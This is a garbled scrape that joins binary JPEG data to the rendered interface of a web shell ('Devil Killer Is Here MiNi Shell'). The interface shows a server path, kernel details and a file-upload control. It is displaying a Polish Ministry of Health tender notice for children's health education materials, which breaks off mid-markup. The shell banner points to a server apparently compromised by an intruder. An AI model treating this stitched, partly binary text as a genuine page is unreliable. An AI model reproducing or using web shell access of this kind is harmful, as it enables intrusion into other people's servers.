JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210430/0004515901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00045159 z dnia 2021-04-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PRZYGOTOWANIE I OPRACOWANIE MATERIAŁÓW PROMOCYJNYCH I EDUKACYJNYCH W RAMACH PROJEKTU PREDEFINIOWANEGO NR 2,PN.„ZDROWY STYL ŻYCIA DZIECI I MŁODZIEŻY”,FINANSOWANEGO Z NMF FINANSOWEGO 2014-2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Zdrowia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000287987</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Miodowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-952</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@mz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZYGOTOWANIE I OPRACOWANIE MATERIAŁÓW PROMOCYJNYCH I EDUKACYJNYCH W RAMACH PROJEKTU PREDEFINIOWANEGO NR 2,PN.„ZDROWY STYL ŻYCIA DZIECI I MŁODZIEŻY”,FINANSOWANEGO Z NMF FINANSOWEGO 2014-2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-14dbbd60-a9b2-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00045159</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007434/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.1 Działania edukacyjno-informacyjno-promocyjne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projektu predefiniowanego nr 2, pn. „Zdrowy styl życia dzieci i młodzieży”, finansowanego z Norweskiego Mechanizmu Finansowego 2014-2021 w ramach Programu pn. „Zdrowie”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-mz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą, w szczególności składanie ofert oraz oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie. 2.	Postępowanie prowadzone jest na Platformie pod adresem https://zamowienia-mz.ezamawiajacy.pl (dalej jako „Platforma”) i pod nazwą postępowania wskazaną w tytule SWZ.3.	Przeglądanie i pobieranie treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania do Platformy.4.	Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie, akceptuje warunki korzystania z Platformy.5.	Zadawanie pytań przez Wykonawców odbywa się poprzez przycisk „Zadaj pytanie”. 6.	Zamawiający informuje na temat kodowania i czasu odbioru danych: 1)	plik z ofertą załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert,2)	oznaczenie czasu odbioru danych przez Platformę znajduje się po lewej stronie dokumentu w kolumnie „Data przesłania” (hh:mm:ss).7.	Do porozumiewania się z Wykonawcami uprawniony jest sekretarz komisji przetargowej- Dorota Porębska. 8.	Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ na zasadach określonych w treści Ustawy PZP.9.	Treść zapytań wraz z wyjaśnieniami zamawiający, zamieszcza na stronie prowadzonego postępowania https://zamowienia-mz.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Ochrona danych osobowych - RODOZgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej „RODO”, informuję, że:1)	Wykonawcy będącego osobą fizyczną,2)	Wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,3)	pełnomocnika Wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),4)	członka organu zarządzającego Wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),5)	osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego lub do kontaktów sprawie realizacji zamówienia; informuję, że:a)	administratorem Pani/Pana danych osobowych jest Minister Zdrowia, Ministerstwo Zdrowia, ul. Miodowa 15, 00-952 Warszawa;b)	z Inspektorem Ochrony Danych w Ministerstwie Zdrowia może Pani/Pan skontaktować się za pośrednictwem poczty elektronicznej przez adres e-mail: iod@mz.gov.pl;c)	Pani/Pana dane osobowe przetwarzane będą w celu związanym z przeprowadzeniem niniejszego postępowania, na podstawie art. 6 ust. 1 lit. c RODO;d)	odbiorcą Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Ustawy PZP;e)	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 Ustawy PZP, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, okres przechowywania obejmuje cały czas trwania umowy;f)	posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania (jeżeli przetwarzanie odbywa się na podstawie zgody), którego dokonano na podstawie zgody przed jej cofnięciem;g)	ma Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;h)	Pani/Pana dane będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.i)	nie przysługuje Pani/Panu:	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> cześć I- Moduł nr 1 Odżywianie i sport - przygotowanie i ocena programu szkoleniowego dotyczącego wyboru zdrowych opcji w przedszkolach i żłobkach oraz opracowanie materiałów promocyjnych i edukacyjnych, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Ekspert odpowiedzialny za przygotowanie i ocenę programu szkoleniowego dotyczącego zdrowych opcji w przedszkolach i żłobkachPosiada co najmniej tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pktb)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 6 pktc)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt Posiada dodatkowe doświadczenie zawodowe (większe niż 3 lata) w obszarze prawidłowego żywienia – max 7 pkt a)	4 lat doświadczenia – 2 pktb)	5 lat doświadczenia – 3 pktc)	6 lat doświadczenia – 4 pktd)	7 lat doświadczenia – 5 pkte)	8 lat doświadczenia – 6 pkt f)	9 lat doświadczenia i więcej – 7 pkt Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 24 godziny) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	34 godziny warsztatów – 3 pktb)	44 godziny warsztatów – 5 pkt c)	54 godziny warsztatów i więcej – 7 pkt Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 2 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	3 programy/scenariusze - 4 pktb)	4 programów/scenariuszy – 5 pktc)	5 programów/scenariuszy - 6 pkt d)	6 programów/scenariuszy i więcej- 7 pktPosiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt B.	Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych Posiada tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	Tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pktb)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 6 pktc)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt Posiada dodatkowe doświadczenie zawodowe (większe niż 3 lata) w obszarze prawidłowego żywienia – max 7 pkt a) 4 lat doświadczenia – 2 pktb)	5 lat doświadczenia – 3 pktc)	6 lat doświadczenia – 4 pktd)	7 lat doświadczenia – 5 pkte)	8 lat doświadczenia – 6 pkt f)	9 lat doświadczenia i więcej – 7 pkt Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 24 godziny) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	34 godziny warsztatów – 3 pktb)	44 godziny warsztatów – 5 pkt c)	54 godziny warsztatów i więcej – 7 pkt Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 2 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	3 programy/scenariusze - 4 pktb)	4 programów/scenariuszy – 5 pktc)	5 programów/scenariuszy - 6 pkt d)	6 programów/scenariuszy i więcej - 7 pktPosiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie ekspertów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> A.	Ekspert odpowiedzialny za przygotowanie i ocenę programu szkoleniowego dotyczącego zdrowych opcji w przedszkolach i żłobkachPosiada co najmniej tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pktb)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 6 pktc)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt Posiada dodatkowe doświadczenie zawodowe (większe niż 3 lata) w obszarze prawidłowego żywienia – max 7 pkt a)	4 lat doświadczenia – 2 pktb)	5 lat doświadczenia – 3 pktc)	6 lat doświadczenia – 4 pktd)	7 lat doświadczenia – 5 pkte)	8 lat doświadczenia – 6 pkt f)	9 lat doświadczenia i więcej – 7 pkt Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 24 godziny) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	34 godziny warsztatów – 3 pktb)	44 godziny warsztatów – 5 pkt c)	54 godziny warsztatów i więcej – 7 pkt Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 2 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	3 programy/scenariusze - 4 pktb)	4 programów/scenariuszy – 5 pktc)	5 programów/scenariuszy - 6 pkt d)	6 programów/scenariuszy i więcej- 7 pktPosiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt B.	Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych Posiada tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	Tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pktb)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 6 pktc)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt Posiada dodatkowe doświadczenie zawodowe (większe niż 3 lata) w obszarze prawidłowego żywienia – max 7 pkt a) 4 lat doświadczenia – 2 pktb)	5 lat doświadczenia – 3 pktc)	6 lat doświadczenia – 4 pktd)	7 lat doświadczenia – 5 pkte)	8 lat doświadczenia – 6 pkt f)	9 lat doświadczenia i więcej – 7 pkt Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 24 godziny) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	34 godziny warsztatów – 3 pktb)	44 godziny warsztatów – 5 pkt c)	54 godziny warsztatów i więcej – 7 pkt Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 2 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	3 programy/scenariusze - 4 pktb)	4 programów/scenariuszy – 5 pktc)	5 programów/scenariuszy - 6 pkt d)	6 programów/scenariuszy i więcej - 7 pktPosiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część II- Moduł nr 3 Zdrowie psychiczne - opracowanie materiałów promocyjnych i edukacyjnych na temat wspierania rodziców i nauczycieli w pomaganiu dzieciom z problemami w zdrowiu psychicznym, opracowanie materiałów na stronę internetową oraz materiałów szkoleniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych dotyczących zdrowia psychicznego dzieci i młodzieżyPosiada co najmniej tytuł naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia - maksymalnie 20 pkt a)	Stopień naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia –10 pktb)	Tytuł naukowy profesora w dziedzinie psychiatrii- 20 pktPosiada dodatkowe doświadczenie zawodowe (większe niż 2 lata) w pracy z dziećmi i młodzieżą w wieku szkolnym (szkoła podstawowa lub szkoły ponadpodstawowe) - maksymalnie 20pkt	a)	3 lata doświadczenia – 15 pktb)	4 lat doświadczenia – 16 pktc)	5 lat doświadczenia – 17 pktd)	6 lat doświadczenia – 18 pkt e)	7 lat doświadczenia –19 pktf)	8 lat doświadczenia i więcej - 20 pkt Posiada dodatkowe doświadczenie (brał/bierze udział w więcej niż 24 godzin) w organizacji warsztatów dla rodziców lub nauczycieli lub opiekunów w dziedzinie zdrowia psychicznego dzieci i młodzieży - maksymalnie 15 pkt	a) 34 godzin warsztatów – 10 pkt b)	44 godzin warsztatów i więcej – 15 pkt Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem więcej niż 1 publikacji lubartykułów poświęconych problematyce zaburzeń psychicznych dzieci i młodzieży - maksymalnie 10 pkt	a)	2 publikacje/artykuły- 5 pktb)	3 publikacji/artykułów - 6 pktc)	4 publikacji/artykułów - 7 pktd)	5 publikacji/artykułów - 8 pkte)	6 publikacji/artykułów – 9 pktf)	7 publikacji/artykułów i więcej- 10 pktPosiada znajomość języka angielskiego na poziomie powyżej B2 – max 5 pkt a)	Tak – 5 pkt b)	Nie – 0 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 